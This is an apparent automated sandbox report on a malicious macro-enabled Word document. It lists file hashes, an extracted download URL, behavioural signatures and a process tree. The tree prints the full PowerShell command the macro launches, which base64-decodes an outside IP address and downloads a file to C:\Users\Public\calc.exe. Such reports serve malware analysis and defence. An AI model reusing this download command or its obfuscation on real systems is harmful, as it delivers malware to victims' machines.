Analysis
- max time kernel: 65s
- max time network: 148s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 20-05-2022 22:04
Static task: static1
Behavioral task: behavioral1
- Sample: 1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: 1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm
- Resource: win10v2004-20220414-en
General
- Target: 1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm
- Size: 153KB
- MD5: 6d713af398101fb1ce7c6cd4831fd01e
- SHA1: 83be76755052d2a67ea1f07d4de4b937327e19fe
- SHA256: 1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29
- SHA512: 2b0a9adafb002b3f2fb7f62fdee15572aa7883554b4780474aaaa1b2c82759c13ad3c6868f95c9399ee685094cb2b469b127f7fbf48567fb3f87b8ae178d7d3a
Malware Config
- Extracted: http://62.171.152.105/Hfhue723bhDSF9uyhfwe
Signatures
- Process spawned unexpected child process (3 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description / pid / pid_target / process / target process):
  - Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process / 4700 / 4052 / cmd.exe / WINWORD.EXE
  - Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process / 4692 / 4052 / cmd.exe / WINWORD.EXE
  - Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process / 2496 / 4052 / cmd.exe / WINWORD.EXE
- Blocklisted process makes network request (1 IoC)
  Processes (flow / pid / process):
  - 22 / 2160 / powershell.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description / ioc / process):
  - Key opened / \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 / WINWORD.EXE
  - Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz / WINWORD.EXE
  - Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString / WINWORD.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description / ioc / process):
  - Key opened / \REGISTRY\MACHINE\Hardware\Description\System\BIOS / WINWORD.EXE
  - Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily / WINWORD.EXE
  - Key value queried / \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU / WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes (pid / process):
  - 4052 / WINWORD.EXE
  - 4052 / WINWORD.EXE
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid / process):
  - 2160 / powershell.exe
  - 2160 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description / pid / process):
  - Token: SeDebugPrivilege / 2160 / powershell.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes (pid / process):
  - 4052 / WINWORD.EXE
  - 4052 / WINWORD.EXE
  - 4052 / WINWORD.EXE
  - 4052 / WINWORD.EXE
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes (description / pid / process / target process; each entry is recorded twice in the report):
  - PID 4052 wrote to memory of 4700 / 4052 / WINWORD.EXE / cmd.exe
  - PID 4700 wrote to memory of 4648 / 4700 / cmd.exe / cmd.exe
  - PID 4052 wrote to memory of 4692 / 4052 / WINWORD.EXE / cmd.exe
  - PID 4052 wrote to memory of 2496 / 4052 / WINWORD.EXE / cmd.exe
  - PID 4692 wrote to memory of 2160 / 4692 / cmd.exe / powershell.exe
  - PID 2496 wrote to memory of 4424 / 2496 / cmd.exe / cmd.exe
  - PID 4424 wrote to memory of 720 / 4424 / cmd.exe / choice.exe
Processes (tree; indentation shows the parent/child depth reported by the sandbox)
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1e7619ea43467167cade758f8d611b25d40c2a3e93ca541e6acfd4ede2c81b29.docm" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\Users\Public\hg32j.bat
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe
      Command line: cmd /c mkdir C:\Users\Public\kjh4ek
  - C:\Windows\SYSTEM32\cmd.exe
    Command line: cmd /C powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzYyLjE3MS4xNTIuMTA1L0hmaHVlNzIzYmhEU0Y5dXloZndl')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovLzYyLjE3MS4xNTIuMTA1L0hmaHVlNzIzYmhEU0Y5dXloZndl')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXGNhbGMuZXhl')))
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\Users\Public\kjh4ek\ndj34h.bat
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      Command line: C:\Windows\System32\cmd.exe /C choice /C Y /N /D Y /T 20
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\choice.exe
        Command line: choice /C Y /N /D Y /T 20
Downloads
- C:\Users\Public\hg32j.bat
  Filesize: 35B
  MD5: a5da72ee0446ec6ccf16298d20de53d9
  SHA1: d39910505712193c1058d77663d828f81075b7bf
  SHA256: c6b36bf33bea0b0b636ccf415fbc9f99b66a0d8871883869bd0dbf6ee7508836
  SHA512: 12e33315a913ce92125f2805b9141ddad520818e73fb35f8be9d383b2642c137bbe4b8df770418e9a051f1a21f8d45aa4f242bfea933f4007488cb49f4922939
- C:\Users\Public\kjh4ek\ndj34h.bat
  Filesize: 83B
  MD5: b95ea117e4f9873b9016c76c31a2f572
  SHA1: b54c86c8d1418b5cfc75fd4f75292ffc040cb4ad
  SHA256: 78e21ae946d4d531c82c859a58c6aa0e0f6c346a30d542be7c2079426ba6e177
  SHA512: d58d157224fde457dc1e40d1cad7429da96bf49015e1d6cbf2d1dd4085cd2ba723cfd439960922522942603f7f12879e76b4644160bec688f911224fd44f5b83